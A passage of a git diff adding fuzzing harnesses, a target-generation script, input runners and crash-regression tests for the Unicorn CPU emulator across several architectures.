uc_open(UC_ARCH_ARM, UC_MODE_THUMB, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_m68k_be.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_m68k_be.c new file mode 100644 index 0000000..cd2bf59 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_m68k_be.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_M68K, UC_MODE_BIG_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32be.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32be.c new file mode 100644 index 0000000..dbe3141 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32be.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32le.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32le.c new file mode 100644 index 0000000..02786ce --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_mips_32le.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_MIPS, UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_sparc_32be.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_sparc_32be.c new file mode 100644 index 0000000..8d3209c --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_sparc_32be.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_SPARC, UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_16.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_16.c new file mode 100644 index 0000000..3e5c6c4 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_16.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_X86, UC_MODE_16, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_32.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_32.c new file mode 100644 index 0000000..d1e3305 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_32.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_X86, UC_MODE_32, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_64.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_64.c new file mode 100644 index 0000000..f4f63cb --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/fuzz_emu_x86_64.c @@ -0,0 +1,56 @@ +#include + + +// memory address where emulation starts +#define ADDRESS 0x1000000 + +uc_engine *uc; +int initialized = 0; +FILE * outfile = NULL; + + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size) { + uc_err err; + + if (initialized == 0) { + if (outfile == NULL) { + // we compute the output + outfile = fopen("/dev/null", "w"); + if (outfile == NULL) { + printf("failed opening /dev/null\n"); + abort(); + return 0; + } + } + + initialized = 1; + } + + // Not global as we must reset this structure + // Initialize emulator in supplied mode + err = uc_open(UC_ARCH_X86, UC_MODE_64, &uc); + if (err != UC_ERR_OK) { + printf("Failed on uc_open() with error returned: %u\n", err); + abort(); + } + + // map 4MB memory for this emulation + uc_mem_map(uc, ADDRESS, 4 * 1024 * 1024, UC_PROT_ALL); + + // write machine code to be emulated to memory + if (uc_mem_write(uc, ADDRESS, Data, Size)) { + printf("Failed to write emulation code to memory, quit!\n"); + abort(); + } + + // emulate code in infinite time & 4096 instructions + // avoid timeouts with infinite loops + err=uc_emu_start(uc, ADDRESS, ADDRESS + Size, 0, 0x1000); + if (err) { + fprintf(outfile, "Failed on uc_emu_start() with error returned %u: %s\n", err, uc_strerror(err)); + } + + uc_close(uc); + + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/gentargets.sh b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/gentargets.sh new file mode 100644 index 0000000..9238505 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/gentargets.sh @@ -0,0 +1,21 @@ +#/bin/sh +# generates all fuzz targets for different architectures from the template in fuzz_emu_x86_32.c + +sed 's/UC_MODE_32/UC_MODE_64/' fuzz_emu_x86_32.c > fuzz_emu_x86_64.c +sed 's/UC_MODE_32/UC_MODE_16/' fuzz_emu_x86_32.c > fuzz_emu_x86_16.c + +sed 's/UC_ARCH_X86/UC_ARCH_SPARC/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_SPARC32|UC_MODE_BIG_ENDIAN/' > fuzz_emu_sparc_32be.c +#sed 's/UC_ARCH_X86/UC_ARCH_SPARC/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_SPARC64|UC_MODE_BIG_ENDIAN/' > fuzz_emu_sparc_64be.c + +sed 's/UC_ARCH_X86/UC_ARCH_M68K/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_BIG_ENDIAN/' > fuzz_emu_m68k_be.c + +sed 's/UC_ARCH_X86/UC_ARCH_MIPS/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_MIPS32 + UC_MODE_LITTLE_ENDIAN/' > fuzz_emu_mips_32le.c +sed 's/UC_ARCH_X86/UC_ARCH_MIPS/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_MIPS32 + UC_MODE_BIG_ENDIAN/' > fuzz_emu_mips_32be.c + +sed 's/UC_ARCH_X86/UC_ARCH_ARM64/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM/' > fuzz_emu_arm64_arm.c +sed 's/UC_ARCH_X86/UC_ARCH_ARM64/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm64_armbe.c + +sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM/' > fuzz_emu_arm_arm.c +sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_THUMB/' > fuzz_emu_arm_thumb.c +sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_ARM + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm_armbe.c +#sed 's/UC_ARCH_X86/UC_ARCH_ARM/' fuzz_emu_x86_32.c | sed 's/UC_MODE_32/UC_MODE_THUMB + UC_MODE_BIG_ENDIAN/' > fuzz_emu_arm_thumbbe.c diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onedir.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onedir.c new file mode 100644 index 0000000..21f9a76 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onedir.c @@ -0,0 +1,80 @@ +#include +#include +#include +#include +#include + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size); + +int main(int argc, char** argv) +{ + FILE * fp; + uint8_t Data[0x1000]; + size_t Size; + DIR *d; + struct dirent *dir; + int r = 0; + int i; + + if (argc != 2) { + return 1; + } + + d = opendir(argv[1]); + if (d == NULL) { + printf("Invalid directory\n"); + return 2; + } + if (chdir(argv[1]) != 0) { + closedir(d); + printf("Invalid directory\n"); + return 2; + } + + printf("Starting directory %s\n", argv[1]); + while((dir = readdir(d)) != NULL) { + //opens the file, get its size, and reads it into a buffer + if (dir->d_type != DT_REG) { + continue; + } + //printf("Running file %s\n", dir->d_name); + fflush(stdout); + fp = fopen(dir->d_name, "rb"); + if (fp == NULL) { + r = 3; + break; + } + if (fseek(fp, 0L, SEEK_END) != 0) { + fclose(fp); + r = 4; + break; + } + Size = ftell(fp); + if (Size == (size_t) -1) { + fclose(fp); + r = 5; + break; + } else if (Size > 0x1000) { + fclose(fp); + continue; + } + if (fseek(fp, 0L, SEEK_SET) != 0) { + fclose(fp); + r = 7; + break; + } + if (fread(Data, Size, 1, fp) != 1) { + fclose(fp); + r = 8; + break; + } + + //lauch fuzzer + LLVMFuzzerTestOneInput(Data, Size); + fclose(fp); + } + closedir(d); + printf("Ok : whole directory finished %s\n", argv[1]); + return r; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onefile.c b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onefile.c new file mode 100644 index 0000000..3146cc0 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/fuzz/onefile.c @@ -0,0 +1,49 @@ +#include +#include +#include + +int LLVMFuzzerTestOneInput(const uint8_t *Data, size_t Size); + +int main(int argc, char** argv) +{ + FILE * fp; + uint8_t *Data; + size_t Size; + + if (argc != 2) { + return 1; + } + //opens the file, get its size, and reads it into a buffer + fp = fopen(argv[1], "rb"); + if (fp == NULL) { + return 2; + } + if (fseek(fp, 0L, SEEK_END) != 0) { + fclose(fp); + return 2; + } + Size = ftell(fp); + if (Size == (size_t) -1) { + fclose(fp); + return 2; + } + if (fseek(fp, 0L, SEEK_SET) != 0) { + fclose(fp); + return 2; + } + Data = malloc(Size); + if (Data == NULL) { + fclose(fp); + return 2; + } + if (fread(Data, Size, 1, fp) != 1) { + fclose(fp); + return 2; + } + + //lauch fuzzer + LLVMFuzzerTestOneInput(Data, Size); + fclose(fp); + return 0; +} + diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/.gitignore b/ai_anti_malware/unicorn/unicorn-master/tests/regress/.gitignore new file mode 100644 index 0000000..ca97ad9 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/.gitignore @@ -0,0 +1,40 @@ +!*.c + +arm_enable_vfp +map_crash +sigill +sigill2 +block_test +map_write +ro_mem_test +nr_mem_test +timeout_segfault +rep_movsb +mips_kseg0_1 +eflags_nosync +00opcode_uc_crash +eflags_noset +invalid_read_in_cpu_tb_exec +invalid_write_in_cpu_tb_exec_x86_64 +x86_16_segfault +mips_invalid_read_of_size_4_when_tracing +invalid_read_in_tb_flush_x86_64 +sparc_jump_to_zero +mips_delay_slot_code_hook +threaded_emu_start +emu_stop_in_hook_overrun +mips_branch_likely_issue +emu_clear_errors +001-bad_condition_code_0xe +002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0 +003-qemu__fatal__wdebug_not_implemented +004-segmentation_fault_1 +005-qemu__fatal__illegal_instruction__0000___00000404 +006-qemu__fatal__illegal_instruction__0421___00040026 + +rw_hookstack +hook_extrainvoke +sysenter_hook_x86 + +memleak_* +mem_* diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/001-bad_condition_code_0xe.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/001-bad_condition_code_0xe.c new file mode 100644 index 0000000..bcc51e8 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/001-bad_condition_code_0xe.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_ARM +#define HARDWARE_MODE 16 +#define MEMORY_STARTING_ADDRESS 8192 +#define MEMORY_SIZE 4096 +#define MEMORY_PERMISSIONS 6 +#define BINARY_CODE "\x56\xe8\x46\x46\x80\xf6\x8c\x56\xff\xbf\xcd\x90\xda\xa0\xed\xe8\x46\x43\x45\xe5\x80\x90\x44\x46\x04" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0.c new file mode 100644 index 0000000..6f8575b --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/002-qemu__fatal__unimplemented_control_register_write_0xffb___0x0.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_M68K +#define HARDWARE_MODE 1073741824 +#define MEMORY_STARTING_ADDRESS 8388608 +#define MEMORY_SIZE 2097152 +#define MEMORY_PERMISSIONS 7 +#define BINARY_CODE "\xaf\x80\x4e\x7b\xff\xfb\x80\x4e\x3e\x80" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/003-qemu__fatal__wdebug_not_implemented.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/003-qemu__fatal__wdebug_not_implemented.c new file mode 100644 index 0000000..4e07235 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/003-qemu__fatal__wdebug_not_implemented.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_M68K +#define HARDWARE_MODE 1073741824 +#define MEMORY_STARTING_ADDRESS 1048576 +#define MEMORY_SIZE 403456 +#define MEMORY_PERMISSIONS 7 +#define BINARY_CODE "\x42\xc7\xfb\xfb\x54\x36" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/004-segmentation_fault_1.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/004-segmentation_fault_1.c new file mode 100644 index 0000000..636cae7 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/004-segmentation_fault_1.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_ARM +#define HARDWARE_MODE 16 +#define MEMORY_STARTING_ADDRESS 1024 +#define MEMORY_SIZE 1796096 +#define MEMORY_PERMISSIONS 7 +#define BINARY_CODE "\x20\xbf\xbf\xbf\xbf\xdd\x5d\x74\x5e\x66\x72\x10" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/005-qemu__fatal__illegal_instruction__0000___00000404.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/005-qemu__fatal__illegal_instruction__0000___00000404.c new file mode 100644 index 0000000..b2bea73 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/005-qemu__fatal__illegal_instruction__0000___00000404.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_M68K +#define HARDWARE_MODE 1073741824 +#define MEMORY_STARTING_ADDRESS 1024 +#define MEMORY_SIZE 1044480 +#define MEMORY_PERMISSIONS 5 +#define BINARY_CODE "\x4c\x4c" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/006-qemu__fatal__illegal_instruction__0421___00040026.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/006-qemu__fatal__illegal_instruction__0421___00040026.c new file mode 100644 index 0000000..607c9d5 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/006-qemu__fatal__illegal_instruction__0421___00040026.c @@ -0,0 +1,31 @@ +#include + +#define HARDWARE_ARCHITECTURE UC_ARCH_M68K +#define HARDWARE_MODE 1073741824 +#define MEMORY_STARTING_ADDRESS 262144 +#define MEMORY_SIZE 403456 +#define MEMORY_PERMISSIONS 7 +#define BINARY_CODE "\xe2\x86\x09\xbc\xf2\x17\x09\xca\xca\xca\xca\x09\x09\x09\xf2\x17\x09\x20\x09\x09\xf2\x08\x09\x03\x09\xca\x6b\x6b\x6b\x1e\xca\xca\x86\x09\x09\xf2\x17\x09\x04\x21\x09\x09\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf4\xf2" + +static void hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *user_data) { + printf("hook_code(…) called\n"); +} + +int main(int argc, char **argv, char **envp) { + uc_engine *uc; + if (uc_open(HARDWARE_ARCHITECTURE, HARDWARE_MODE, &uc)) { + printf("uc_open(…) failed\n"); + return 1; + } + uc_mem_map(uc, MEMORY_STARTING_ADDRESS, MEMORY_SIZE, MEMORY_PERMISSIONS); + if (uc_mem_write(uc, MEMORY_STARTING_ADDRESS, BINARY_CODE, sizeof(BINARY_CODE) - 1)) { + printf("uc_mem_write(…) failed\n"); + return 1; + } + uc_hook trace; + uc_hook_add(uc, &trace, UC_HOOK_CODE, hook_code, NULL, (uint64_t)MEMORY_STARTING_ADDRESS, (uint64_t)(MEMORY_STARTING_ADDRESS + 1)); + printf("uc_emu_start(…)\n"); + uc_emu_start(uc, MEMORY_STARTING_ADDRESS, MEMORY_STARTING_ADDRESS + sizeof(BINARY_CODE) - 1, 0, 0); + printf("done\n"); + return 0; +} diff --git a/ai_anti_malware/unicorn/unicorn-master/tests/regress/00opcode_uc_crash.c b/ai_anti_malware/unicorn/unicorn-master/tests/regress/00opcode_uc_crash.c new file mode 100644 index 0000000..e735cfe --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/tests/regress/00opcode_uc_crash.c @@ -0,0 